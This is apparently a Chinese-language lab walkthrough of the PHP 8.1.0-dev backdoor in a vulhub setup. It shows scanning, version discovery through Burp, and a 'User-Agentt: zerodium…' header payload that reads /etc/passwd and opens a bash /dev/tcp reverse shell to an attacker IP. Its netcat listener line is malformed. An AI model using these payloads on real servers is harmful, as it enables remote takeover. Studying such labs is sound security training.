漏洞介绍
-
关于漏洞:PHP 8.1.0-dev 后门远程命令执行漏洞 PHP verion 8.1.0-dev的PHP在服务器上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。 影响版本:PHP 8.1.0-dev -
配置环境: 靶机:centos8 攻击机:kali 其他:vulhub -->php–>8.1-backdoor -
漏洞攻击思路: 扫描端口,确定开启的服务,漏洞寻找,漏洞利用
信息收集
-
nmap扫描端口

-
访问http://192.168.0.118:8080 访问8080时显示如下hello world界面  查看源码,检查元素没有发现有用信息,用burp抓包试试 -
burp抓包 burp抓包,发送至Repeater,Go一下,返回包中有 X-Powered-By: PHP/8.1.0-dev,得到了php版本号  -
查找漏洞 百度一下 PHP/8.1.0漏洞,找到PHP-8.1.0-dev 后门命令执行漏洞 
漏洞利用
-
POC验证 User-Agentt: zerodiumvar_dump(2*3); //或者User-Agentt: zerodiumsystem(“cat /etc/passwd”);   -
监听 nc -lvp 192.168.0.118:8080 -
反弹shell User-Agentt: zerodiumsystem(“bash -c ‘exec bash -i >& /dev/tcp/192.168.0.116/6666 0>&1’”);  反弹成功 
|